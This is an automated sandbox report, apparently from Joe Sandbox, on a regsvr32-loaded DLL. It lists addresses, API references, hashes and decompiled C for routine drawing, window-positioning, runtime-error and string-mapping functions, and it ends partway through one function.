0x10039edc
0x10039e1b
0x10039e1f
0x10039e2c
0x10039e36
0x10039e39
0x10039e3f
0x10039e3f
0x10039e44
0x10039e49
0x10039e4a
0x10039e4d
0x10039e4f
0x10039e52
0x10039e64
0x10039e64
0x10039e54
0x10039e54
0x10039e57
0x10039e59
0x10039e5a
0x10039e60
0x10039e60
0x10039e66
0x10039e6a
0x10039e6d
0x10039e73
0x10039e78
0x10039e78
0x10039e7b
0x10039e83
0x10039e83
0x10039e85
0x10039e88
0x10039e8d
0x10039e8d
0x10039e90
0x10039e98
0x10039e98
0x10039e9a
0x10039e9d
0x10039ea2
0x10039ea2
0x10039ea5
0x10039ead
0x10039ead
0x10039eb2
0x10039eb8
0x10039ec4
0x10039ec7
0x00000000
0x10039e2e
0x10039e2e
0x10039efc
0x10039efc
0x10039f01
0x10039f04
0x10039f0a
0x10039f0c
0x00000000
0x10039f1d
0x10039f24
0x00000000
0x00000000
0x10039f7f
0x10039f82
0x10039f85
0x00000000
0x00000000
0x10039f3c
0x10039f3f
0x00000000
0x00000000
0x10039f46
0x10039f49
0x00000000
0x00000000
0x10039f29
0x10039f2c
0x10039f2f
0x10039f31
0x10039f34
0x00000000
0x00000000
0x10039f53
0x10039f58
0x10039f5b
0x00000000
0x00000000
0x10039f63
0x10039f66
0x10039f68
0x10039f6c
0x10039f6f
0x00000000
0x00000000
0x10039f73
0x10039f76
0x10039f79
0x10039f7a
0x10039f7b
0x10039f7c
0x00000000
0x00000000
0x00000000
0x00000000
0x10039f13
0x10039f19
0x00000000
0x00000000
0x10039f0c
0x10039f0a
0x10039e2c
0x10039e15
0x10039f87
0x10039f8d
0x10039f98

APIs

__EH_prolog.LIBCMT ref: 10039B2B
lstrlenA.KERNEL32(?,?,?), ref: 10039B65
VariantClear.OLEAUT32(?), ref: 10039DF8
VariantClear.OLEAUT32(?), ref: 10039E1F
SysFreeString.OLEAUT32(?), ref: 10039E83
SysFreeString.OLEAUT32(?), ref: 10039E98
SysFreeString.OLEAUT32(?), ref: 10039EAD
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
VariantClear.OLEAUT32(?), ref: 10039EF5

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
String ID:
API String ID: 344392101-0
Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10033FCE Relevance: 19.7, APIs: 13, Instructions: 233
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10033FCE(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t132;
				void* _t145;
				intOrPtr* _t226;
				void* _t229;

				E10011BF0(0x1003b231, _t229);
				_t226 = __ecx;
				 *((intOrPtr*)(_t229 - 0x30)) = 0;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
				 *(_t229 - 4) = 2;
				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
				CopyRect(_t229 - 0x44,  *(_t229 + 8));
				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
				_t235 =  *((intOrPtr*)(_t229 + 0x20));
				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
				}
				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
				}
				 *((intOrPtr*)(_t229 - 0x18)) = 0;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x10)) = 0;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
				 *(_t229 - 4) = 4;
				if( *(_t229 + 0x14) != 0) {
					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
					E1001045D(_t229 - 0x24, _t229 - 0x44);
					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
					E10028E1A(_t226, _t229 - 0x1c);
					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
					E10029439(_t226,  *(_t229 + 0x14));
				}
				_t132 = _t229 - 0x14;
				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
					_t132 = _t229 - 0x34;
				}
				E10028E1A(_t226, _t132);
				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
				if( *(_t229 + 0x14) != 0) {
					E10029439(_t226,  *(_t229 + 0x14));
				}
				E10028E1A(_t226, 0);
				 *(_t229 - 4) = 3;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
				E100293B4(_t229 - 0x14);
				 *(_t229 - 4) = 2;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x1c);
				 *(_t229 - 4) = 1;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
				E100293B4(_t229 - 0x24);
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x2c);
				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
				_t145 = E100293B4(_t229 - 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
				return _t145;
			}

0x10033fd3
0x10033fe5
0x10033fe7
0x10033fea
0x10033fed
0x10033ff0
0x10033ff3
0x10033ff6
0x10033ff9
0x10034002
0x10034006
0x10034012
0x10034028
0x10034036
0x1003404a
0x1003405d
0x1003406f
0x10034074
0x10034077
0x1003407e
0x1003407e
0x10034084
0x10034089
0x10034089
0x1003408c
0x1003408f
0x10034092
0x10034095
0x1003409b
0x1003409f
0x100340b5
0x100340c0
0x100340cc
0x100340e2
0x100340f0
0x100340fd
0x1003410f
0x10034120
0x1003412c
0x1003413e
0x1003413e
0x10034120
0x10034155
0x10034162
0x1003416f
0x10034182
0x1003419b
0x100341a2
0x100341a2
0x100341aa
0x100341ad
0x100341af
0x100341af
0x100341b5
0x100341c2
0x100341d5
0x100341ee
0x100341f3
0x100341fa
0x100341fa
0x10034202
0x1003420f
0x10034213
0x10034216
0x1003421e
0x10034222
0x10034225
0x1003422d
0x10034231
0x10034234
0x1003423c
0x1003423f
0x10034242
0x10034247
0x1003424e
0x10034251
0x1003425c
0x10034264

APIs

__EH_prolog.LIBCMT ref: 10033FD3

Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3

CopyRect.USER32 ref: 10034012
InflateRect.USER32(?,?,?), ref: 10034028
IntersectRect.USER32 ref: 10034036
CreateRectRgnIndirect.GDI32(?), ref: 10034040
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053

Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
CopyRect.USER32 ref: 100340CC
InflateRect.USER32(?,?,?), ref: 100340E2
IntersectRect.USER32 ref: 100340F0
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126

Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B

Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
String ID:
API String ID: 897514543-0
Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100219DD Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100202AB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E10007B50(E10007AE5(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006C53();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E10007B50(E10007AE5(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

0x100219dd
0x100219e5
0x100219e8
0x100219f0
0x100219f3
0x100219f8
0x10021a03
0x10021a15
0x10021a05
0x10021a08
0x10021a08
0x10021a1b
0x10021a1f
0x10021a2b
0x10021a33
0x10021a35
0x10021a35
0x10021a33
0x100219fa
0x100219fa
0x100219fa
0x10021a44
0x10021a4a
0x10021aea
0x10021af1
0x10021af8
0x10021b02
0x10021a50
0x10021a52
0x10021a57
0x10021a62
0x10021a6b
0x10021a6b
0x10021a62
0x10021a6f
0x10021a76
0x10021ab7
0x10021ac6
0x10021ad3
0x10021a78
0x10021a78
0x10021a7f
0x10021a81
0x10021a81
0x10021a91
0x10021aa4
0x10021aae
0x10021aae
0x10021a76
0x10021b11
0x10021b16
0x10021b1c
0x10021b23
0x10021b26
0x10021b2d
0x10021b34
0x10021b3b
0x10021b42
0x10021b47
0x10021b4e
0x10021b55
0x10021b5d
0x10021b5d
0x10021b49
0x10021b49
0x10021b49
0x10021b62
0x10021b6e
0x10021b76
0x10021b76
0x10021b64
0x10021b64
0x10021b64
0x10021b8f

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetParent.USER32(?), ref: 10021A08
SendMessageA.USER32 ref: 10021A2B
GetWindowRect.USER32 ref: 10021A44
GetWindowLongA.USER32 ref: 10021A57
CopyRect.USER32 ref: 10021AA4
CopyRect.USER32 ref: 10021AAE
GetWindowRect.USER32 ref: 10021AB7
CopyRect.USER32 ref: 10021AD3

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10016BAA Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 111
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t41;
				signed int _t54;
				unsigned int _t59;
				void* _t75;
				intOrPtr* _t76;
				signed int _t81;
				char* _t83;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;

				_push(0x118);
				_push(0x10042558);
				E10012514(__ebx, __edi, __esi);
				_t32 =  *0x1004c470; // 0xf256d946
				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
				_t33 =  *0x1004f708; // 0x0
				if(_t33 == 0) {
					if( *((intOrPtr*)(_t88 + 8)) == 1) {
						_t83 = "Buffer overrun detected!";
						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t86 = 0xb9;
					} else {
						_t83 = "Unknown security failure detected!";
						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t86 = 0xd4;
					}
					 *((char*)(_t88 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
						E10017B90(_t88 - 0x124, "<program name unknown>");
					}
					_t71 = _t88 - 0x124;
					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
						_t89 = _t89 + 0x10;
					}
					_t41 = E10011820(_t71);
					_pop(_t75);
					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
					_t87 = _t89;
					E10017B90(_t87, _t83);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87, "Program: ");
					E10017BA0(_t87, _t71);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87,  *(_t88 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t87);
					E10019D1D();
					_t89 = _t89 + 0x3c;
				} else {
					 *(_t88 - 4) = 0;
					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				}
				E10011F56(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *(_t89 + 4);
				_t76 =  *((intOrPtr*)(_t89 + 8));
				if((_t81 & 0x00000003) != 0) {
					if((_t81 & 0x00000001) == 0) {
						L27:
						_t54 =  *_t81;
						_t81 = _t81 + 2;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t54 = _t54;
							if(_t54 == 0) {
								goto L21;
							} else {
								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
									goto L22;
								} else {
									if(_t54 == 0) {
										goto L21;
									} else {
										_t76 = _t76 + 2;
										goto L12;
									}
								}
							}
						}
					} else {
						_t54 =  *_t81;
						_t81 = _t81 + 1;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t76 = _t76 + 1;
							if(_t54 == 0) {
								goto L21;
							} else {
								if((_t81 & 0x00000002) == 0) {
									goto L12;
								} else {
									goto L27;
								}
							}
						}
					}
				} else {
					while(1) {
						L12:
						_t54 =  *_t81;
						if(_t54 !=  *_t76) {
							break;
						}
						_t54 = _t54;
						if(_t54 == 0) {
							L21:
							return 0;
						} else {
							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
								break;
							} else {
								_t59 = _t54;
								if(_t59 == 0) {
									goto L21;
								} else {
									_t54 = _t59 >> 0x10;
									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
										break;
									} else {
										_t54 = _t54;
										if(_t54 == 0) {
											goto L21;
										} else {
											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
												break;
											} else {
												_t76 = _t76 + 4;
												_t81 = _t81 + 4;
												if(_t54 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
						goto L32;
					}
					L22:
					asm("sbb eax, eax");
					return (_t54 << 1) + 1;
				}
				L32:
			}

0x10016baa
0x10016baf
0x10016bb4
0x10016bb9
0x10016bbe
0x10016bc1
0x10016bca
0x10016bef
0x10016c07
0x10016c0c
0x10016c16
0x10016bf1
0x10016bf1
0x10016bf6
0x10016c00
0x10016c00
0x10016c1b
0x10016c33
0x10016c41
0x10016c47
0x10016c48
0x10016c5d
0x10016c7c
0x10016c81
0x10016c81
0x10016c85
0x10016c8a
0x10016c95
0x10016c9a
0x10016c9d
0x10016ca1
0x10016cad
0x10016cb8
0x10016cbf
0x10016cc6
0x10016cd2
0x10016cd7
0x10016cdc
0x10016ce1
0x10016ce2
0x10016ce7
0x10016bcc
0x10016bcc
0x10016bd5
0x10016bd9
0x10016bd9
0x10016cec
0x10016cf1
0x10016cf2
0x10016cf3
0x10016cf4
0x10016cf5
0x10016cf6
0x10016cf7
0x10016cf8
0x10016cf9
0x10016cfa
0x10016cfb
0x10016cfc
0x10016cfd
0x10016cfe
0x10016cff
0x10016d00
0x10016d04
0x10016d0e
0x10016d52
0x10016d6c
0x10016d6c
0x10016d6f
0x10016d74
0x00000000
0x10016d76
0x10016d76
0x10016d78
0x00000000
0x10016d7a
0x10016d7d
0x00000000
0x10016d7f
0x10016d81
0x00000000
0x10016d83
0x10016d83
0x00000000
0x10016d83
0x10016d81
0x10016d7d
0x10016d78
0x10016d54
0x10016d54
0x10016d56
0x10016d5b
0x00000000
0x10016d5d
0x10016d5d
0x10016d62
0x00000000
0x10016d64
0x10016d6a
0x00000000
0x00000000
0x00000000
0x00000000
0x10016d6a
0x10016d62
0x10016d5b
0x10016d10
0x10016d10
0x10016d10
0x10016d10
0x10016d14
0x00000000
0x00000000
0x10016d16
0x10016d18
0x10016d40
0x10016d42
0x10016d1a
0x10016d1d
0x00000000
0x10016d1f
0x10016d1f
0x10016d21
0x00000000
0x10016d23
0x10016d23
0x10016d29
0x00000000
0x10016d2b
0x10016d2b
0x10016d2d
0x00000000
0x10016d2f
0x10016d32
0x00000000
0x10016d34
0x10016d34
0x10016d37
0x10016d3c
0x00000000
0x00000000
0x00000000
0x00000000
0x10016d3c
0x10016d32
0x10016d2d
0x10016d29
0x10016d21
0x10016d1d
0x00000000
0x10016d18
0x10016d44
0x10016d44
0x10016d4b
0x10016d4b
0x00000000

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
_strlen.LIBCMT ref: 10016C51
_strlen.LIBCMT ref: 10016C62
_strncpy.LIBCMT ref: 10016C7C
_strlen.LIBCMT ref: 10016C85

Strings

<program name unknown>, xrefs: 10016C35
..., xrefs: 10016C76
Microsoft Visual C++ Runtime Library, xrefs: 10016CDC
Unknown security failure detected!, xrefs: 10016BF1
Program: , xrefs: 10016CB2
Buffer overrun detected!, xrefs: 10016C07, 10016C9F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$FileModuleName_strncpy
String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 2455649890-1673886896
Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9

Uniqueness

Uniqueness Score: -1.00%

Function 10018081 Relevance: 16.8, APIs: 11, Instructions: 299
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x10042708);
				E10012514(__ebx, __edi, __esi);
				_t199 =  *0x1004f73c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1004f73c = 2;
						}
					} else {
						 *0x1004f73c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1004f73c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1004f724; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E1001A444(0,  *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E100107C8(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E1001A487(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
